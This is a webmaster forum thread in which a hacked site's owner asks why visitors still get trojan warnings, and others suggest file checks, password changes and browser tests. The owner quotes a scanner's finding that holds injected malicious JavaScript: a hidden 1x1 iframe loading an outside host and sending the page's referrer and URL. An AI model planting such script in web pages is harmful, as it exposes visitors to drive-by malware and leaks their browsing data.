Users reporting that there is a virus on my site.
-
A few months ago I found out that someone had hacked my site and placed malicious code and modified my .htaccess. I am pretty certain that I have cleared up all of the bad code (within 12 hours of it being infected). Yet, I am getting people telling me that their virus checker is warning them of a trojan on my site.
Is there anything that can be done?
I have no malware warnings in my Webmaster Tools.
The site currently has 2 articles that are going viral and I'd hate for that to be screwed up by a stupid virus!
-
Hi,
My advice would be to check the files in your FTP for the specific site, look over your website files too see if any thing should not be in their such as malicious files, directory's which have been made by the hacker. Did you also check if the hacker has made any new pages on the website?
Did you also change all passwords after the site was hacked from the CMS level? Also depending on your CMS you can get plugins to scan for malicious files.I hope this helps.
-
Hi Marie,
Good advice from James here.
One other question I would ask - have you checked the site in all browsers? There are viruses written for specific browsers such as IE. I have seen a situation where a site was infected, but nobody in the company knew because they were all using Chrome or Firefox. As soon as a customer hit the site with IE all the flashing lights and sirens went off!
Also, have you asked those reporting a problem for details of the virus scanning software they are using? If you can nail down the virus scanner involved and run an online scan from that company's website you should be able to replicate the report and see what exactly is happening.
Hope that helps,
Sha
-
I think that may be because IE does a much better job and detecting these things.
Let me take a guess, this site is a wordpress site?
-
Thanks guys. The site does have 2 wordpress blogs, but the warnings are coming from hard coded (by me) static pages.
sitecheck.sucuri.net gave me this warning when my site was scanned:
****Known javascript malware.
Details: ****http://sucuri.net/malware/malware-entry-mwiframehd20<scriptlanguage=javascript>document.write(<iframesrc=http: frankwsgoldie.in="" showads.php?2&seoref="encodeURIComponent(document.referrer)&HTTP_REFERER=encodeURIComponent(document.URL)width=1height=1frameborder=0">);</iframesrc=http:></scriptlanguage=javascript>
I can't see that code anywhere on my site!
-
03139
-
03102
-
04697
-
09142
-
06583
-
08837
-
02718
-
031.2k